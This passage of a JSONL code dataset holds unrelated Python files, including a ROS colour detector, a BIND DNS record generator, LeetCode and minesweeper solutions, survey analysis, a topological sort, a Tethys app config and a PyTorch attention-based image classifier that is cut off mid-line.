x[2] * x[3]))\n            cv2.rectangle(frame, tuple(rect[0:2]), tuple(rect[0:2] + rect[2:4]), (0, 0, 255), thickness=2)\n            cent = (rect[0:2]*2+rect[2:4])/2\n            print(cent)\n            self.posi_pub.publish(cent[0])\n        \n\n        if len(rects_red) == 0:\n            self.monitor(None,frame)\n            return None\n\n        r =rects_red[0]\n        self.monitor(r,frame)\n        return r\n\n    \n\n    \n\nif __name__=='__main__':\n    rospy.init_node('red_pick')\n    fd = red_pick()\n\n    rate = rospy.Rate(10)\n    while not rospy.is_shutdown():\n        fd.pick_check()\n        rate.sleep()#rosrun image_view image_view image:=/red\n","sub_path":"src/flag_down.py","file_name":"flag_down.py","file_ext":"py","file_size_in_byte":2440,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"}
+{"seq_id":"592079005","text":"#!/usr/bin/python\r\nimport csv\r\n\r\ninput_file_name = \"germanyenergy.csv\"\r\nforward_file_name = \"germanyforward.txt\"\r\nreverse_file_name = \"germanyreverse.txt\"\r\ndomain_name = \".energy.germany.\"\r\n\r\ninput_file = open(input_file_name,'r')\r\nforward_file = open(forward_file_name,'w')\r\nreverse_file = open(reverse_file_name,'w')\r\ninput_reader = csv.reader(input_file)\r\n\r\nfor line in input_reader:\r\n\thost = line[0]\r\n\tip = line[1]\r\n\tfqdn = host + domain_name\r\n\tpadding = ' ' * (30 - len(fqdn))\r\n\tforward_file.write(fqdn + padding +'IN A ' + ip + '\\n')\r\n\t[i1,i2,i3,i4] = ip.split('.')\r\n\trevaddr = i4 + '.' + i3 + '.' + i2 + '.' + i1 + '.in-addr.arpa.'\r\n\tpadding = ' ' * (30 - len(revaddr))\r\n\treverse_file.write(revaddr + padding + 'IN PTR ' + fqdn + '\\n')","sub_path":"Exercise Initialization/Bind Config/germanyenergy.py","file_name":"germanyenergy.py","file_ext":"py","file_size_in_byte":742,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"}
+{"seq_id":"1516992","text":"# uncompyle6 version 3.7.4\n# Python bytecode 3.7 (3394)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: build\\bdist.win32\\egg\\py_buildsystem\\py_buildsystem.py\n# Compiled at: 2019-01-14 14:07:24\n# Size of source mod 2**32: 1105 bytes\nimport sys, argparse\nfrom py_buildsystem.common import logger, levels\nimport py_buildsystem.Project.Project as Project\nimport py_buildsystem.Toolchain.Toolchain as Toolchain\nsys.tracebacklimit = 0\nparser = argparse.ArgumentParser(usage='python -m py_buildsystem [options]', description='Python based build system.')\nparser.add_argument('compiler_config', metavar='CC', type=str, nargs=1, help='Compiler configuration file')\nparser.add_argument('project_config', metavar='PC', type=str, nargs=1, help='Project configuration file')\nparser.add_argument('compiler_path', metavar='path', type=str, nargs='?', default='', help='Path to compiler')\nparser.add_argument('-v', '--verbose', action='store_true', help='verbose mode')\nargs = parser.parse_args()\nif args.v is True:\n    logger.setLevel(levels['DEBUG'])\nelse:\n    logger.setLevel(levels['INFO'])\ntoolchain = Toolchain(args.compiler_config[0], args.compiler_path)\nproject = Project(args.project_config[0], toolchain)","sub_path":"pycfiles/py_buildsystem-0.6.3-py3.7/py_buildsystem.cpython-37.py","file_name":"py_buildsystem.cpython-37.py","file_ext":"py","file_size_in_byte":1253,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"}
+{"seq_id":"373248345","text":"# 283. Move Zeroes\n# ttungl@gmail.com\n\n# Given an array nums, write a function to move all 0's to the end of it while maintaining the relative order of the non-zero elements.\n\n# For example, given nums = [0, 1, 0, 3, 12], after calling your function, nums should be [1, 3, 12, 0, 0].\n\n# Note:\n# You must do this in-place without making a copy of the array.\n# Minimize the total number of operations.\n\n\nclass Solution(object):\n    def moveZeroes(self, nums):\n        \"\"\"\n        :type nums: List[int]\n        :rtype: void Do not return anything, modify nums in-place instead.\n        \"\"\"\n        # sol 1:\n        # runtime: 86ms\n        i = 0\n        for num in nums:\n            if num!=0:\n                nums[i] = num\n                i += 1\n        while i < len(nums):\n            nums[i] = 0\n            i += 1\n        \n        # sol 2\n        # runtime: 58ms\n        j = 0\n        for i, num in enumerate(nums):\n            if num!=0:\n                nums[i], nums[j] = nums[j], nums[i]\n                j += 1\n        \n        \n\n\n\n\n\n","sub_path":"source-code/Move Zeroes 283.py","file_name":"Move Zeroes 283.py","file_ext":"py","file_size_in_byte":1038,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"}
+{"seq_id":"314814374","text":"from pprint import pprint\ncol, row = map(int, input().split())\n\nmatrix = []\nfor i in range(row):\n    matrix.append(list(input()))\npprint(matrix, indent=2)\n\ndef countMines(i, k):\n    if matrix[i][k] == '*':\n        return '*'\n\n    count = 0\n    for r in range(i-1, i+2):\n        for c in range(k-1, k+2):\n            if r < 0 or c < 0 or r >= row or c >= col:\n                continue\n            if matrix[r][c] == '*':\n                count += 1\n    return count\n\nfor i in range(row):\n    for k in range(col):\n        print(countMines(i, k), end='')\n    print()\n","sub_path":"Unit 23/u23_eval2.py","file_name":"u23_eval2.py","file_ext":"py","file_size_in_byte":563,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"}
+{"seq_id":"45069011","text":"import pandas as pd\n\ndf = pd.read_csv('answer_sheet.csv',index_col=0)\n\nout = \"output.txt\" #出力ファイルの初期化\nf = open(out,\"w\")\nf.write(\"\")\nf.close()\n\nd = df.shape #データフレームの行数、列数の取得\n\nfor var1 in range(0,d[1]): #質問項目1つめ\n    for var2 in range(0,d[1]): #質問項目2つめ\n        if var1 != var2:\n            count0 = 0 #0→?の総和\n            count0_0 = 0 #0-0\n            count0_1 = 0 #0-1\n            count1 = 0 #1→?総和\n            count1_0 = 0 #1-0\n            count1_1 = 0 #1-1\n            for var3 in range(0,d[0]): #プレイヤーID\n                if not (df.iloc[var3,var1] == \"X\" or df.iloc[var3,var2] == \"X\") or (df.iloc[var3,var1] == \"?\" or df.iloc[var3,var2] == \"?\"):\n                    if df.iloc[var3,var1] == \"0\" and df.iloc[var3,var2] != \"0\":\n                        count0 = count0 +1\n                        count0_0 = count0_0 +1\n                    elif df.iloc[var3,var1] == \"0\" and df.iloc[var3,var2] != \"1\":\n                        count0 = count0 +1\n                        count0_1 = count0_1 +1\n                    elif df.iloc[var3,var1] == \"1\" and df.iloc[var3,var2] != \"0\":\n                        count1 = count1 +1\n                        count1_0 = count1_0 +1\n                    else:\n                        count1 = count1 +1\n                        count1_1 = count1_1 +1\n            count0_0 = count0_0/count0*100\n            count0_1 = count0_1/count0*100\n            count1_0 = count1_0/count1*100\n            count1_1 = count1_1/count1*100\n            if count0_0 > 85:\n                f = open(out,\"a\")\n                f.write(str(var1+1) + \"→\" + str(var2+1) + \",0→0:\" + str(count0) + \",\" + str(count0_0) + \"\\n\")\n                f.close()\n            elif count0_1 >85:\n                f = open(out,\"a\")\n                f.write(str(var1+1) + \"→\" + str(var2+1) + \",0→1:\" + str(count0) + \",\" + str(count0_1) + \"\\n\")\n                f.close()\n            elif count1_0 >85:\n                f = open(out,\"a\")\n                f.write(str(var1+1) + \"→\" + str(var2+1) + \",1→0:\" + str(count1) + \",\" + str(count1_0) + \"\\n\")\n                f.close()\n            elif count1_1 >85:\n                f = open(out,\"a\")\n                f.write(str(var1+1) + \"→\" + str(var2+1) + \",1→1:\" + str(count1) + \",\" + str(count1_1) + \"\\n\")\n                f.close()","sub_path":"answer_cl.py","file_name":"answer_cl.py","file_ext":"py","file_size_in_byte":2382,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"}
+{"seq_id":"443409347","text":"#Lembrando que o grafo não pode ter cíclo e deve ser direcionado\nn,m = map(int,input().split())\n\ngrafo = [[] for i in range(n)]\n\nvisitados = [-1] * n\nresp = []\n\nfor x in range(m):\n    a,b = map(int,input().split())\n    grafo[a-1].append(b)\n\ndef dfs(v):\n    visitados[v-1] = 0\n\n    for adj in grafo[v-1]:\n        if visitados[adj-1] == -1:\n            dfs(adj)\n\n    resp.append(v)\n\ndef topological_sort():\n    for i in range(n):\n        if visitados[i] == -1:\n            dfs(i)\n    return resp[::-1]\n\nprint(topological_sort())\n","sub_path":"topological_sort.py","file_name":"topological_sort.py","file_ext":"py","file_size_in_byte":529,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"}
+{"seq_id":"370808905","text":"##\nfrom ii_params import *\n\n## Params\ntrial = 50\n\n##\ngs_kw = dict(height_ratios=[20,2,1], wspace=0.1, hspace=0.1, left=.1, right=.975, top=.96, bottom=.02)\nfig,axs = pl.subplots(3, 1, num='Trial {}'.format(trial), figsize=(5,9), sharex=True, gridspec_kw=gs_kw); axs=axs.ravel()\n\ntinfo = trials[trials.idx==trial].squeeze()\n\nti2c = i2c[i2c.trial==trial]\nafi = ti2c.abs_frame_idx.values\n\ndfft = dff[afi.min():afi.max()]\nsigt = pf.Series(is_sig[afi.min():afi.max()])\ndfft.plot(ax=axs[0], color='k', binary_label=sigt)\n#axs[0].set_yticks([])\n#sigt.plot(ax=axs[0], color='k')\naxs[0].vlines(dff.index[afi], 0, axs[0].get_ylim()[1], linestyles='--', color='k')\naxs[1].vlines(dff.index[afi], 0, axs[1].get_ylim()[1], linestyles='--', color='k')\naxs[0].set_title(', '.join(['{}: {:0.1f}'.format(i,tinfo[i]) for i in ['side','choice','outcome','ratio']]))\n\n# plot ar events\nfor styl,ons in zip((puff_m,lick_m), (puff_onset,lick_onset)):\n    o = ons[ons.trial==trial]\n    o = [o[o.direction==i].frame.values for i in range(2)]\n    for oi,m in zip(o,('<','>')):\n        axs[2].scatter(dff.index[oi], np.zeros_like(oi), marker=m, **styl)\n        axs[0].vlines(dff.index[oi], 0, axs[0].get_ylim()[1], linestyles='--', color=styl['color'], alpha=0.3)\n        axs[1].vlines(dff.index[oi], 0, axs[0].get_ylim()[1], linestyles='--', color=styl['color'], alpha=0.3)\n# plot hall\no = hall_onset[hall_onset.trial==trial]\no = o.frame.values\naxs[2].scatter(dff.index[o], np.zeros_like(o), **hall_m)\naxs[2].set_yticks([])\naxs[2].set_ylim([-.5,.5])\npretty(ax=axs[0])\n\ntake_sl = slice(afi.min(), afi.max())\nrct = rollcor[take_sl]\nrct.index = dff.index[take_sl]\nrct.plot(ax=axs[1])\n#axs[1].set_ylabel('mean r')\naxs[1].set_xticks([])\naxs[1].set_yticks([])\npretty(ax=axs[1])\nticf(ax=axs[1], y=10)\naxs[1].set_ylim([rct.min(), rct.max()])\n##\n","sub_path":"analysis/c6/ii_trial.py","file_name":"ii_trial.py","file_ext":"py","file_size_in_byte":1810,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"}
+{"seq_id":"98134931","text":"from tethys_sdk.base import TethysAppBase, url_map_maker\n\n\nclass Lfhazard(TethysAppBase):\n    \"\"\"\n    Tethys app class for Liquefaction Hazard Lookup.\n    \"\"\"\n\n    name = 'Liquefaction Hazard Parameter Lookup'\n    index = 'lfhazard:home'\n    icon = 'lfhazard/images/icon.gif'\n    package = 'lfhazard'\n    root_url = 'lfhazard'\n    color = '#915F6D'\n    description = ''\n    tags = ''\n    enable_feedback = False\n    feedback_emails = []\n\n    def url_maps(self):\n        \"\"\"\n        Add controllers\n        \"\"\"\n        urlmap = url_map_maker(self.root_url)\n\n        return (\n            urlmap(\n                name='home',\n                url=f'{self.root_url}/',\n                controller='lfhazard.controllers.home'\n            ),\n            urlmap(\n                name='getgeojson',\n                url=f'{self.root_url}/getgeojson',\n                controller='lfhazard.controllers.get_geojson'\n            ),\n            urlmap(\n                name='querycsv',\n                url=f'{self.root_url}/querycsv',\n                controller='lfhazard.controllers.query_csv'\n            ),\n        )\n","sub_path":"tethysapp/lfhazard/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1104,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"}
+{"seq_id":"437190691","text":"\n\nimport math\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport numpy as np\n\n\nBATCH_NORM_DECAY = 1 - 0.9  # pytorch batch norm `momentum = 1 - counterpart` of tensorflow\nBATCH_NORM_EPSILON = 1e-5\ntype = 0\n\ndef get_act(activation):\n    \"\"\"Only supports ReLU and SiLU/Swish.\"\"\"\n    assert activation in ['relu', 'silu']\n    if activation == 'relu':\n        return nn.ReLU()\n    else:\n        return nn.Hardswish()  # TODO: pytorch's nn.Hardswish() v.s. tf.nn.swish\n\n\nclass BNReLU(nn.Module):\n    \"\"\"\"\"\"\n\n    def __init__(self, out_channels, activation='relu', nonlinearity=True, init_zero=False):\n        super(BNReLU, self).__init__()\n\n        self.norm = nn.BatchNorm2d(out_channels, momentum=BATCH_NORM_DECAY, eps=BATCH_NORM_EPSILON)\n        if nonlinearity:\n            self.act = get_act(activation)\n        else:\n            self.act = None\n\n        if init_zero:\n            nn.init.constant_(self.norm.weight, 0)\n        else:\n            nn.init.constant_(self.norm.weight, 1)\n\n    def forward(self, input):\n        out = self.norm(input)\n        if self.act is not None:\n            out = self.act(out)\n        return out\n\n\nclass RelPosSelfAttention(nn.Module):\n    \"\"\"Relative Position Self Attention\"\"\"\n\n    def __init__(self, h, w, dim, relative=True, fold_heads=False):\n        super(RelPosSelfAttention, self).__init__()\n        self.relative = relative\n        self.fold_heads = fold_heads\n        self.rel_emb_w = nn.Parameter(torch.Tensor(2 * w - 1, dim))\n        self.rel_emb_h = nn.Parameter(torch.Tensor(2 * h - 1, dim))\n\n        nn.init.normal_(self.rel_emb_w, std=dim ** -0.5)\n        nn.init.normal_(self.rel_emb_h, std=dim ** -0.5)\n\n    def forward(self, q, k, v):\n        \"\"\"2D self-attention with rel-pos. 
Add option to fold heads.\"\"\"\n bs, heads, h, w, dim = q.shape\n q = q * (dim ** -0.5) # scaled dot-product\n logits = torch.einsum('bnhwd,bnpqd->bnhwpq', q, k)\n if self.relative:\n logits += self.relative_logits(q)\n weights = torch.reshape(logits, [-1, heads, h, w, h * w])\n weights = F.softmax(weights, dim=-1)\n weights = torch.reshape(weights, [-1, heads, h, w, h, w])\n attn_out = torch.einsum('bnhwpq,bnpqd->bhwnd', weights, v)\n if self.fold_heads:\n attn_out = torch.reshape(attn_out, [-1, h, w, heads * dim])\n return attn_out\n\n def relative_logits(self, q):\n # Relative logits in width dimension.\n rel_logits_w = self.relative_logits_1d(q, self.rel_emb_w, transpose_mask=[0, 1, 2, 4, 3, 5])\n # Relative logits in height dimension\n rel_logits_h = self.relative_logits_1d(q.permute(0, 1, 3, 2, 4), self.rel_emb_h,\n transpose_mask=[0, 1, 4, 2, 5, 3])\n return rel_logits_h + rel_logits_w\n\n def relative_logits_1d(self, q, rel_k, transpose_mask):\n bs, heads, h, w, dim = q.shape\n rel_logits = torch.einsum('bhxyd,md->bhxym', q, rel_k)\n rel_logits = torch.reshape(rel_logits, [-1, heads * h, w, 2 * w - 1])\n rel_logits = self.rel_to_abs(rel_logits)\n rel_logits = torch.reshape(rel_logits, [-1, heads, h, w, w])\n rel_logits = torch.unsqueeze(rel_logits, dim=3)\n rel_logits = rel_logits.repeat(1, 1, 1, h, 1, 1)\n rel_logits = rel_logits.permute(*transpose_mask)\n return rel_logits\n\n def rel_to_abs(self, x):\n \"\"\"\n Converts relative indexing to absolute.\n Input: [bs, heads, length, 2*length - 1]\n Output: [bs, heads, length, length]\n \"\"\"\n bs, heads, length, _ = x.shape\n col_pad = torch.zeros((bs, heads, length, 1), dtype=x.dtype).cuda()\n x = torch.cat([x, col_pad], dim=3)\n flat_x = torch.reshape(x, [bs, heads, -1]).cuda()\n flat_pad = torch.zeros((bs, heads, length - 1), dtype=x.dtype).cuda()\n flat_x_padded = torch.cat([flat_x, flat_pad], dim=2)\n final_x = torch.reshape(\n flat_x_padded, [bs, heads, length + 1, 2 * length - 1])\n final_x = final_x[:, :, :length, length - 1:]\n return final_x\n\n\nclass AbsPosSelfAttention(nn.Module):\n \"\"\"\n\n \"\"\"\n\n def __init__(self, W, H, dkh, absolute=True, fold_heads=False):\n super(AbsPosSelfAttention, self).__init__()\n self.absolute = absolute\n self.fold_heads = fold_heads\n\n self.emb_w = nn.Parameter(torch.Tensor(W, dkh))\n self.emb_h = nn.Parameter(torch.Tensor(H, dkh))\n nn.init.normal_(self.emb_w, dkh ** -0.5)\n nn.init.normal_(self.emb_h, dkh ** -0.5)\n\n def forward(self, q, k, v):\n bs, heads, h, w, dim = q.shape\n q = q * (dim ** -0.5) # scaled dot-product\n logits = torch.einsum('bnhwd,bnpqd->bnhwpq', q, k)\n abs_logits = self.absolute_logits(q)\n if self.absolute:\n logits += abs_logits\n weights = torch.reshape(logits, [-1, heads, h, w, h * w])\n weights = F.softmax(weights, dim=-1)\n weights = torch.reshape(weights, [-1, heads, h, w, h, w])\n attn_out = torch.einsum('bnhwpq,bnpqd->bhwnd', weights, v)\n if self.fold_heads:\n attn_out = torch.reshape(attn_out, [-1, h, w, heads * dim])\n return attn_out\n\n def absolute_logits(self, q):\n \"\"\"Compute absolute position enc logits.\"\"\"\n emb_h = self.emb_h[:, None, :]\n emb_w = self.emb_w[None, :, :]\n emb = emb_h + emb_w\n abs_logits = torch.einsum('bhxyd,pqd->bhxypq', q, emb)\n return abs_logits\n\n\nclass GroupPointWise(nn.Module):\n \"\"\"\"\"\"\n\n def __init__(self, in_channels, heads=4, proj_factor=1, target_dimension=None):\n super(GroupPointWise, self).__init__()\n if target_dimension is not None:\n proj_channels = target_dimension // proj_factor\n 
else:\n proj_channels = in_channels // proj_factor\n self.w = nn.Parameter(\n torch.Tensor(in_channels, heads, proj_channels // heads)\n )\n\n nn.init.normal_(self.w, std=0.01)\n\n def forward(self, input):\n # dim order: pytorch BCHW v.s. TensorFlow BHWC\n input = input.permute(0, 2, 3, 1).float()\n \"\"\"\n b: batch size\n h, w : imput height, width\n c: input channels\n n: num head\n p: proj_channel // heads\n \"\"\"\n out = torch.einsum('bhwc,cnp->bnhwp', input, self.w)\n return out\n\n\nclass MHSA(nn.Module):\n \"\"\"\n \"\"\"\n\n def __init__(self, in_channels, heads, curr_h, curr_w, pos_enc_type='relative', use_pos=True):\n super(MHSA, self).__init__()\n self.q_proj = GroupPointWise(in_channels, heads, proj_factor=1)\n self.k_proj = GroupPointWise(in_channels, heads, proj_factor=1)\n self.v_proj = GroupPointWise(in_channels, heads, proj_factor=1)\n\n assert pos_enc_type in ['relative', 'absolute']\n if pos_enc_type == 'relative':\n self.self_attention = RelPosSelfAttention(curr_h, curr_w, in_channels // heads, fold_heads=True)\n else:\n raise NotImplementedError\n\n def forward(self, input):\n q = self.q_proj(input)\n k = self.k_proj(input)\n v = self.v_proj(input)\n\n o = self.self_attention(q=q, k=k, v=v)\n return o\n\n\n\nclass GTBotBlock(nn.Module):\n\n\n def __init__(self, in_dimension, curr_h, curr_w, proj_factor=4, activation='relu', pos_enc_type='relative',\n stride=1, target_dimension=2048):\n super(GTBotBlock, self).__init__()\n if stride != 1 or in_dimension != target_dimension:\n self.shortcut = nn.Sequential(\n nn.Conv2d(in_dimension, target_dimension, kernel_size=1, stride=stride),\n BNReLU(target_dimension, activation=activation, nonlinearity=True),\n )\n else:\n self.shortcut = None\n\n bottleneck_dimension = target_dimension // proj_factor\n self.conv1 = nn.Sequential(\n nn.Conv2d(in_dimension, bottleneck_dimension, kernel_size=1, stride=1),\n BNReLU(bottleneck_dimension, activation=activation, nonlinearity=True)\n )\n\n self.mhsa = MHSA(in_channels=bottleneck_dimension, heads=4, curr_h=curr_h, curr_w=curr_w,\n pos_enc_type=pos_enc_type)\n conv2_list = []\n if stride != 1:\n assert stride == 2, stride\n conv2_list.append(nn.AvgPool2d(kernel_size=(2, 2), stride=(2, 2))) # TODO: 'same' in tf.pooling\n conv2_list.append(BNReLU(bottleneck_dimension, activation=activation, nonlinearity=True))\n self.conv2 = nn.Sequential(*conv2_list)\n\n self.conv3 = nn.Sequential(\n nn.Conv2d(bottleneck_dimension, target_dimension, kernel_size=1, stride=1),\n BNReLU(target_dimension, nonlinearity=False, init_zero=True),\n )\n\n self.last_act = get_act(activation)\n\n\n def forward(self, x):\n if self.shortcut is not None:\n shortcut = self.shortcut(x)\n else:\n shortcut = x\n\n out = self.conv1(x)\n Q_h = Q_w = 4\n N, C, H, W = out.shape\n P_h, P_w = H // Q_h, W // Q_w\n \n if type == 1:\n out = out.reshape(N, C, P_h, Q_h, P_w, Q_w)\n out = out.permute(0, 2, 4, 1, 3, 5)\n out = out.reshape(N * P_h * P_w, C, Q_h, Q_w)\n out = self.mhsa(out)\n out = out.permute(0, 3, 1, 2) # back to pytorch dim order\n \n out = self.conv2(out)\n N1, C1, H1, W1 = out.shape\n if type == 1:\n out = out.reshape(N , P_h , P_w, C, int(Q_h/2), int(Q_w/2))\n out = out.permute(0, 3, 1, 4, 2, 5)\n out = out.reshape(N, C1, int(H1 * (N1 / N) ** 0.5), int(W1 * (N1 / N) ** 0.5))\n out = self.conv3(out)\n\n out += shortcut\n out = self.last_act(out)\n\n return out\n\n\n\nclass GTBotBlock2(nn.Module):\n\n def __init__(self, in_dimension, curr_h, curr_w, proj_factor=4, activation='relu', pos_enc_type='relative',\n 
stride=1, target_dimension=2048):\n super(GTBotBlock2, self).__init__()\n if stride != 1 or in_dimension != target_dimension:\n self.shortcut = nn.Sequential(\n nn.Conv2d(in_dimension, target_dimension, kernel_size=1, stride=stride),\n BNReLU(target_dimension, activation=activation, nonlinearity=True),\n )\n else:\n self.shortcut = None\n\n bottleneck_dimension = target_dimension // proj_factor\n self.conv1 = nn.Sequential(\n nn.Conv2d(in_dimension, bottleneck_dimension, kernel_size=1, stride=1),\n BNReLU(bottleneck_dimension, activation=activation, nonlinearity=True)\n )\n\n self.mhsa = MHSA(in_channels=bottleneck_dimension, heads=4, curr_h=curr_h, curr_w=curr_w,\n pos_enc_type=pos_enc_type)\n conv2_list = []\n if stride != 1:\n assert stride == 2, stride\n conv2_list.append(nn.AvgPool2d(kernel_size=(2, 2), stride=(2, 2))) # TODO: 'same' in tf.pooling\n conv2_list.append(BNReLU(bottleneck_dimension, activation=activation, nonlinearity=True))\n self.conv2 = nn.Sequential(*conv2_list)\n\n self.conv3 = nn.Sequential(\n nn.Conv2d(bottleneck_dimension, target_dimension, kernel_size=1, stride=1),\n BNReLU(target_dimension, nonlinearity=False, init_zero=True),\n )\n\n self.last_act = get_act(activation)\n\n\n def forward(self, x):\n if self.shortcut is not None:\n shortcut = self.shortcut(x)\n else:\n shortcut = x\n\n\n out = self.conv1(x)\n\n Q_h = Q_w = 8\n N, C, H, W = out.shape\n P_h, P_w = H // Q_h, W // Q_w\n\n if type == 1:\n out = out.reshape(N, C, P_h, Q_h, P_w, Q_w)\n out = out.permute(0, 2, 4, 1, 3, 5)\n out = out.reshape(N * P_h * P_w, C, Q_h, Q_w)\n\n out = self.mhsa(out)\n out = out.permute(0, 3, 1, 2) # back to pytorch dim order\n out = self.conv2(out)\n\n N1, C1, H1, W1 = out.shape\n if type == 1:\n out = out.reshape(N , P_h , P_w, C, int(Q_h/2), int(Q_w/2))\n out = out.permute(0, 3, 1, 4, 2, 5)\n out = out.reshape(N, C1, int(H1 * (N1 / N) ** 0.5), int(W1 * (N1 / N) ** 0.5))\n\n out = self.conv3(out)\n out += shortcut\n out = self.last_act(out)\n\n return out\n\n\n\nclass BotBlock(nn.Module):\n\n def __init__(self, in_dimension, curr_h, curr_w, proj_factor=4, activation='relu', pos_enc_type='relative',\n stride=1, target_dimension=2048):\n super(BotBlock, self).__init__()\n if stride != 1 or in_dimension != target_dimension:\n self.shortcut = nn.Sequential(\n nn.Conv2d(in_dimension, target_dimension, kernel_size=1, stride=stride),\n BNReLU(target_dimension, activation=activation, nonlinearity=True),\n )\n else:\n self.shortcut = None\n\n bottleneck_dimension = target_dimension // proj_factor\n self.conv1 = nn.Sequential(\n nn.Conv2d(in_dimension, bottleneck_dimension, kernel_size=1, stride=1),\n BNReLU(bottleneck_dimension, activation=activation, nonlinearity=True)\n )\n\n self.mhsa = MHSA(in_channels=bottleneck_dimension, heads=4, curr_h=curr_h, curr_w=curr_w,\n pos_enc_type=pos_enc_type)\n conv2_list = []\n if stride != 1:\n assert stride == 2, stride\n conv2_list.append(nn.AvgPool2d(kernel_size=(2, 2), stride=(2, 2))) # TODO: 'same' in tf.pooling\n conv2_list.append(BNReLU(bottleneck_dimension, activation=activation, nonlinearity=True))\n self.conv2 = nn.Sequential(*conv2_list)\n\n self.conv3 = nn.Sequential(\n nn.Conv2d(bottleneck_dimension, target_dimension, kernel_size=1, stride=1),\n BNReLU(target_dimension, nonlinearity=False, init_zero=True),\n )\n\n self.last_act = get_act(activation)\n\n def forward(self, x):\n out = self.conv1(x)\n\n out = self.mhsa(out)\n out = out.permute(0, 3, 1, 2) # back to pytorch dim order\n\n out = self.conv2(out)\n out = self.conv3(out)\n\n 
if self.shortcut is not None:\n            shortcut = self.shortcut(x)\n        else:\n            shortcut = x\n        out += shortcut\n        out = self.last_act(out)\n        return out\n\n\nCARDINALITY = 32\nDEPTH = 4\nBASEWIDTH = 64\n\n\n\nclass AGGTNeckC(nn.Module):\n\n    def __init__(self, in_channels, out_channels, stride):\n        super().__init__()\n\n        C = CARDINALITY #How many groups a feature map is split into\n\n        D = int(DEPTH * out_channels / BASEWIDTH) #number of channels per group\n        self.split_transforms = nn.Sequential(\n            nn.Conv2d(in_channels, C * D, kernel_size=1, groups=C, bias=False),\n            nn.BatchNorm2d(C * D),\n            nn.ReLU(inplace=True),\n            nn.Conv2d(C * D, C * D, kernel_size=3, stride=stride, groups=C, padding=1, bias=False),\n            nn.BatchNorm2d(C * D),\n            nn.ReLU(inplace=True),\n            nn.Conv2d(C * D, out_channels * 4, kernel_size=1, bias=False),\n            nn.BatchNorm2d(out_channels * 4),\n        )\n\n        self.shortcut = nn.Sequential()\n\n        if stride != 1 or in_channels != out_channels * 4:\n            self.shortcut = nn.Sequential(\n                nn.Conv2d(in_channels, out_channels * 4, stride=stride, kernel_size=1, bias=False),\n                nn.BatchNorm2d(out_channels * 4)\n            )\n\n    def forward(self, x):\n        return F.relu(self.split_transforms(x) + self.shortcut(x))\n\nclass AGGT(nn.Module):\n\n    def __init__(self, block, num_blocks, class_names=3):\n        super().__init__()\n        self.in_channels = 64\n\n        self.conv1 = nn.Sequential(\n            nn.Conv2d(3, 64, 3, stride=1, padding=1, bias=False),\n            nn.BatchNorm2d(64),\n            nn.ReLU(inplace=True)\n        )\n\n        self.conv2 = self._make_layer(block, num_blocks[0], 64, 1)\n        self.conv3 = self._make_layer(block, num_blocks[1], 128, 2)\n        self.conv4 = self._make_layer(block, num_blocks[2], 256, 2)\n        #self.downsample = self._make_downsample_layer()\n        self.conv5 = self._make_gt_layer2(1024,2048)\n        self.conv5_1_x = self._make_layer(block, num_blocks[3], 512, 2)\n\n\n        planes=1024\n        self.globalAvgPool = nn.AdaptiveAvgPool2d(1)\n        self.fc1 = nn.Linear(in_features=planes * 4, out_features=round(planes / 2))\n        self.relu = nn.ReLU(inplace=True)\n        self.fc2 = nn.Linear(in_features=round(planes / 2), out_features=64)\n        self.sigmoid = nn.Sigmoid()\n        self.conv6 = nn.Sequential(\n            nn.Conv2d(2048, 2048, kernel_size=1, stride=1, padding=1, bias=False),\n            BNReLU(2048, activation='relu', nonlinearity=True)\n        )\n\n        self.avg = nn.AdaptiveAvgPool2d((1, 1))\n        self.fc = nn.Linear(512 * 4, 3)  # channel selection in forward() keeps 2048 (= 512 * 4) channels; the original 512 * 4*2 mismatched conv6's output\n\n    def forward(self, x):\n        x = self.conv1(x)\n        x = self.conv2(x)\n        x = self.conv3(x)\n        x = self.conv4(x)\n\n        output1 = self.conv5(x)\n        output2 = self.conv5_1_x(x)\n\n        output = torch.cat([output1, output2], 1)\n\n        out = self.globalAvgPool(output)\n        out = out.view(out.size(0), -1)\n        out = self.fc1(out)\n        out = self.relu(out)\n        out = self.fc2(out)\n        out = self.sigmoid(out)\n        array=out.cpu().detach().numpy()\n        outchanel=torch.zeros(array.shape[0],2048,16,16)\n\n        for i in range(array.shape[0]):\n            asum=array[i]  # per-sample gate vector; the original read the whole batch (asum=array), breaking the indexing below\n            median=np.median(asum)\n\n            posi=np.where(asum>median)\n            if(len(posi[0])!=32):\n                n=32-len(posi[0])\n                mid=np.where(asum == median)[0][0:n]\n                if(len(mid)==1):\n                    mid=(mid,)\n                posi=(np.append(posi[0],mid),)\n\n            posinew=np.array([], dtype=np.int64)  # indices must be integers to index the tensor; the default float dtype raised at output[i, posinew]\n            for p in range(0,32):\n                posinew = np.append(posinew, np.arange(posi[0][p]*64,(posi[0][p]+1)*64))\n\n            outchanel[i] = output[i, posinew, :, :]\n\n        output=outchanel.cuda()\n\n        output = self.conv6(output)\n\n\n        x = self.avg(output)\n        x = x.view(x.size(0), -1)\n\n        x = self.fc(x)\n        return x\n\n    def _make_layer(self, block, num_block, out_channels, stride):\n\n        strides = [stride] + [1] * (num_block - 1)\n        layers = []\n        for stride in strides:\n            layers.append(block(self.in_channels, 
